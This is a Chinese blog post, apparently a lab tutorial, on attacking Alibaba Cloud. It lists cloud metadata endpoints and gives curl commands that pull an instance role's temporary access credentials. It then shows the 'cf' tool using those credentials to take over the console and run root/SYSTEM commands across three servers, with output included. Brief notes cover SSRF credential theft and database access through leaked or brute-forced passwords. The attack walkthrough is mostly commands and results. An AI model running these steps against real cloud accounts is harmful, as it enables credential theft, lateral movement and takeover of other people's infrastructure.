云上攻防-云服务篇&弹性计算&云数据库&实例元数据&控制角色&AK控制台接管

最新推荐文章于 2024-04-14 09:22:47 发布
最新推荐文章于 2024-04-14 09:22:47 发布
阅读量1.5k 收藏
点赞数 12
分类专栏: Cyber-Security 文章标签: 云安全 阿里云 云上攻防
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53009585/article/details/133785101
版权

文章目录

前言

元数据解释:

实例元数据(metadata)包含了弹性计算云服务器实例在阿里云系统中的信息,您可以在运行中的实例内方便地查看实例元数据,并基于实例元数据配置或管理实例。(基本信息:实例ID、IP地址、网卡MAC地址、操作系统类型等信息。实例标识包括实例标识文档和实例标识签名,所有信息均实时生成,常用于快速辨别实例身份。)

各大云元数据地址:

阿里云元数据地址:http://100.100.100.200/
腾讯云元数据地址:http://metadata.tencentyun.com/
华为云元数据地址:http://169.254.169.254/ 亚马云元数据地址:http://169.254.169.254/
微软云元数据地址:http://169.254.169.254/
谷歌云元数据地址:http://metadata.google.internal/

细节方面可通过访问官网找元数据访问触发说明,阿里云示例:
https://help.aliyun.com/zh/ecs/user-guide/manage-instance-metadata

云服务-弹性计算-元数据&SSRF&AK

环境搭建

这里是否启用实例元数据访问通道是默认开启的
在这里插入图片描述创建RAM用户并添加相关测试权限
在这里插入图片描述

授予RAM角色,实例绑定RAM角色将授予实例该角色所拥有的所有权限
在这里插入图片描述思路就是通过拿到的一台云服务器获取ecs用户临时凭证,进行该RAM用户下其他服务器的横向

1、前提条件:

-弹性计算配置访问控制角色
-SSRF漏洞或已取得某云服务器权限(webshell或漏洞rce可以访问触发url)

2、利用环境1:获取某服务器权限后横向移动

-获取关键信息

curl http://100.100.100.200/latest/meta-data/

在这里插入图片描述

curl http://100.100.100.200/latest/meta-data/ram/security-credentials/

-获取临时凭证

curl http://100.100.100.200/latest/meta-data/ram/security-credentials/ecs

在这里插入图片描述此时这个临时凭证的权限就是RAM用户创建时的被授予的权限

这里斥巨资开了三台服务器进行演示 同一RAM管理
在这里插入图片描述

利用AK横向移动

cf工具访问配置
在这里插入图片描述一键列出当前访问凭证的权限
在这里插入图片描述
一键接管控制台
在这里插入图片描述这里也是直接登陆接管
在这里插入图片描述
一键列出当前访问凭证的云服务资源
在这里插入图片描述一键命令执行
在这里插入图片描述

C:\Users\xxxxxx\Desktop\工具\cf_v0.5.0_windows_amd64>cf alibaba ecs exec -b
? 选择一个实例 (Choose a instance):  全部实例 (all instances)

1 i-2ze00ghuljor8w95rlsu (launch-advisor-20231012) > whoami && id && hostname && ifconfig

root
uid=0(root) gid=0(root) groups=0(root)
iZ2ze00ghuljor8w95rlsuZ
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.22.69.152  netmask 255.255.240.0  broadcast 172.22.79.255
        inet6 fe80::216:3eff:fe2e:823b  prefixlen 64  scopeid 0x20<link>
        ether 00:16:3e:2e:82:3b  txqueuelen 1000  (Ethernet)
        RX packets 89310  bytes 132214717 (126.0 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 7650  bytes 669146 (653.4 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 2  bytes 140 (140.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 2  bytes 140 (140.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0


2 i-2ze387xap5u9w3plim4w (launch-advisor-20231012) > whoami && hostname && ipconfig

nt authority\system
iZp5u9w3plim4wZ

Windows IP 配置


以太网适配器 以太网:

   连接特定的 DNS 后缀 . . . . . . . :
   本地链接 IPv6 地址. . . . . . . . : fe80::4dc3:a60d:1f10:54b3%4
   IPv4 地址 . . . . . . . . . . . . : 172.22.69.151
   子网掩码  . . . . . . . . . . . . : 255.255.240.0
   默认网关. . . . . . . . . . . . . : 172.22.79.253


3 i-2ze7ixs89bnm9ofchpso (launch-advisor-20231012) > whoami && id && hostname && ifconfig

root
uid=0(root) gid=0(root) groups=0(root)
iZ2ze7ixs89bnm9ofchpsoZ
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.22.69.150  netmask 255.255.240.0  broadcast 172.22.79.255
        inet6 fe80::216:3eff:fe36:8720  prefixlen 64  scopeid 0x20<link>
        ether 00:16:3e:36:87:20  txqueuelen 1000  (Ethernet)
        RX packets 2300  bytes 1160685 (1.1 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 2296  bytes 288204 (281.4 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

不过对方服务器会告警emmmm:
在这里插入图片描述

3、利用环境2:某服务器上Web资产存在SSRF漏洞

搭建靶场太麻烦了,原理就是利用ssrf请求带外回显出临时凭证,其他操作同上

云服务-云数据库-外部连接&权限提升

环境搭建

在这里插入图片描述
默认不开启外网连接,所以安全性较高,
在这里插入图片描述开通外网连接进行测试
在这里插入图片描述

1、帐号密码:

源码配置中找到(几率高)或爆破手段(几率低)
在这里插入图片描述

2、连接获取:

-白名单&外网 直接Navicat支持连接
在这里插入图片描述
在这里插入图片描述

-内网需要其中内网某一个服务器做转发
遇到了再来补

3、AK利用(权限提升)

An0nymouer
关注
  • 12
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
浅谈云上攻防——云服务攻防矩阵
YDclub的博客
01-10 2753
前言 云服务器(Cloud Virtual Machine,CVM)是一种较为常见的云服务,为用户提供安全可靠以及高效的计算服务。用户可以灵活的扩展以及缩减计算资源,以适应变化的业务需求。使用云服务器可以极大降低用户的软硬件采购成本以及IT 运维成本。 由于云服务器中承载着用户的业务以及数据,其安全性尤为重要而云服务器的风险往往来自于两方面:厂商平台侧的风险与用户在使用云服务器时的风险。与用户侧风险相比,平台侧的漏洞往往带来更广泛的影响,例如于2018 披露的AWS Launching EC2s di
第80天:红蓝对抗-AWD模式&准备&攻防&监控&批量1
08-03
在AWD(Attack With Defence,攻击与防御)模式下,参赛者需要同时扮演攻击者和防御者的角色,这既考验了黑客技能,也考察了安全管理策略。以下是对红蓝对抗AWD模式的一些关键知识点的详细说明: 1. **比赛规则**:...
Day93:云上攻防-云服务&对象存储&Bucket桶&任意上传&域名接管&AccessKey泄漏
qq_61553520的博客
04-10 1731
小迪安全-Day93:云上攻防-云服务&对象存储&Bucket桶&任意上传&域名接管&AccessKey泄漏
SSRF漏洞给云服务元数据带来的安全威胁
最新发布
dzqxwzoe的博客
04-14 756
云服务器的实例元数据是指在实例内部通过访问元数据服务(Metadata Service)获取的实例属性等信息,如实例 ID、VPC信息、网卡信息。元数据包含实例角色所对应的临时凭据的情况下,如果服务器所搭载的对外业务服务存在 SSRF漏洞,将造成云服务器可被攻击者接管的风险。本文来具体实践、学习下 SSRF 漏洞给云服务元数据带来的安全威胁。本文讲述了云服务厂商的云服务实例提供的元数据服务所面临的安全威胁,如果云服务器存在 SSRF。
云上攻防-云服务&对象存储&Bucket桶&任意上传&域名接管&AccessKey泄漏
今天是几号的博客
10-11 2225
云服务,顾名思义就是云上服务,在厂商上购买的产品服务。国内有阿里云腾讯云、华为、天翼、Ucloud、金山等,国外有亚马逊的AWS、Google的GCP、微软的Azure,IBM等。各个厂商对云服务的叫法都不统一,这里统一以AWS为例。S3 对象存储Simple Storage Service,简单的说就是一个类似网盘的东西EC2 即弹性计算服务Elastic Compute Cloud,简单的说就是在云上的一台虚拟机。
云上攻防的攻击思路
Websec
06-28 670
攻击路径:云服务账号AK/SK -> 云服务公开API -> 云服务资源调用(OS镜像,容器镜像,存储桶,数据库,Userdata等)-> 敏感信息泄露(数据,凭据等)RCE -> EC2 Metadata API -> EC2 Userdata -> 敏感凭证 -> 其他EC2或者云服务。攻击路径:公有厂商办公网/DMZ区域 -> 公有员工权限 -> 公有管理面网络 -> 公有生产网。攻击路径:第三方软件漏洞 -> 使用该软件的云服务 -> 云服务系统/平台 -> 其他租户数据。
腾讯云攻防战事(一)| 云上听风,不战而屈人之兵
qcloud_security的博客
08-16 350
对于一场战争而言,情报战早在双方短兵相接之前就已经打响,谁能掌握更多、更精准的情报,往往就掌控了战场的主动权,有更大的把握赢得胜利,甚至能取得以弱胜强、以少胜多的战果。在作家麦家的小说《暗算》中,拥有独特天赋能够从纷繁复杂的信号中辨别出敌方电台、截获秘密情报的工作者,被称为“听风者”。 (电影《听风者》剧照) 在腾讯,也有这样一群“云上听风者”。他们通过自主研发的情报监测系统和高效的安全运...
一文透析腾讯云云上攻防体系
qcloud_security的博客
01-21 1021
近年来,网络安全问题变得愈发严峻,企业被黑客攻陷事件层出不穷,企业攻防犹如一道隔绝外界侵扰的屏障,一旦屏障被攻破,信息数据安全便失去保障。随着计算浪潮到来,越来越多企业开始在云上探索新航线,期望解决应用数据量庞杂、服务器运维成本高、主机运行不稳定、配套资源待完善等问题,而计算应用的热潮,也让云上安全成为新的命题。 攻防对抗: 云上安全的一道墙 进入时代,企业与企业之间以及企业与用户之...
ATT&CK中文手册.zip
11-24
一、Initial Access(入口点) 二、Execution(命令执行) 三、Persistence(持久化) 四、Privilege Escalation(权限提升) 五、Defense Evasion(绕过防御...movement(横向渗透) 九、C&C(命令控制) 十、Exfiltration(信息窃取
CVE-2022-22980 exp && 靶场.zip
01-16
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,...
青藤-2020年中国主机安全市场报告-Frost&Sullivan-26
07-18
【中国主机安全市场报告】由Frost & Sullivan与头豹研究院共同发布,全面剖析了2020年中国主机安全市场的现状、特点、技术趋势和发展动态。该报告旨在揭示市场竞争格局,突出领军品牌的竞争优势。 1. **功能...
如何建立企业内部的ATT&CK.pdf
09-13
2017年推出了针对企业环境的ATT&CK for Enterprise,随后相继推出针对移动设备、环境、工业控制系统和容器环境的ATT&CK框架。这些版本旨在覆盖日益复杂的攻击面,提供全面的威胁建模。 **2. ATT&CK设计哲学** ...
【漏洞案例】云上攻防-记一次打穿云上内网的攻防实战
Websec
06-28 3327
1.信息收集和思路的转变很重要,有了思路,信息收集似乎是个体力活。2.云服务器别反弹shell,必然会报警,通过cf来执行命令就行;通过控制台进行远程登陆,应该不会产生报警;fscan在内网中无脑扫尚不清楚会不会触发报警。3.在一个内网中,如果有多台Linux和少量winserver,直接对winserver进行信息收集价值可能会更大,原因是由于习惯问题,图形化的windows更方便用来管理资产吧~
腾讯云攻防战事(二)丨漏洞收敛,使敌不知其所攻
qcloud_security的博客
08-19 598
善攻者,敌不知其所守;善守者,敌不知其所攻——《孙子兵法》 网络安全圈流传着这样一句话:世界上只有两种企业,一种是知道已经被黑客入侵的企业,另一种则是被入侵却浑然不知的企业。 尽管这样的说法可能言过其实,但不可否认的是,潜藏在暗中的黑客无时不刻都在伺机发动攻击,窃取企业数据资产、破坏生产系统;而看不见的交易,在暗网上每分每秒都在进行。 2014年2月,在世界上最早的比特币交易平台——日本的M...
各个厂商获取实例metadata的地址
神棍之路
05-21 1278
注意必须在厂商的实例上运行 谷歌 必须加-H “Metadata-Flavor: Google” 例如: curl -s http://metadata.google.internal/computeMetadata/v1/instance/cpu-platform -H “Metadata-Flavor: Google” 参考文档地址 https://cloud.google.com/compute/docs/storing-retrieving-metadata?hl=zh_cn 虚拟机认元数据.
Launcher启动过程
八归少年
12-28 1034
系统启动的最后一步就是启动一个程序来显示系统中已经安装的应用程序,这个程序就是Launcher,Launcher在启动过程中会请求PackageManagerService返回系统中已经安装的应用程序信息,并将这些信息封装成一个快捷图标显示在系统屏幕上,这样用户就可以通过点击这些快捷图标来启动相应的应用程序。
云安全-云服务器(RAM)后渗透
告白的博客
10-27 450
当账户配备了ram账户,即给该账户赋予了对于云上服务器的一些管理权限,一是方便了用户管理,但另一方面当存在服务器失陷且存在RAM用户权限,可能对云上服务器资产造成很大的危害。也就是说,数据库的登录需要在设置的云服务器且是配置的内网段环境中登录,在对互联网上的资产来说,无疑是非常安全的,但可以配置公网访问添加白名单。当获取了一台云服务器权限,首先定位其厂商,再通过元数据读取到一些相关信息,如果配备了RAM,即可尝试读取临时凭证,进行云上渗透。在集群配置选项中,需要给数据库配置路由交换,专有虚拟网络。
阿里云-获取实例元数据
Swallow_he的博客
04-23 1972
实例元数据介绍 实例元数据包含了ECS实例阿里云系统中的基本信息,例如实例ID、IP地址、网卡MAC地址和操作系统类型等。实例还支持动态实例元数据项,动态实例元数据是在实例初次启动以后产生或自定义的数据,目前包括系统事件、实例标识和实例自定义数据。 获取实例元数据 1、远程连接实例 2、执行以下命令访问元数据的根目录, curl http://100.100.100.200/late...
案例-基于大数据的智能端安全防护系统-冯景辉
02-28
案例-基于大数据的智能端安全防护系统-冯景辉

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值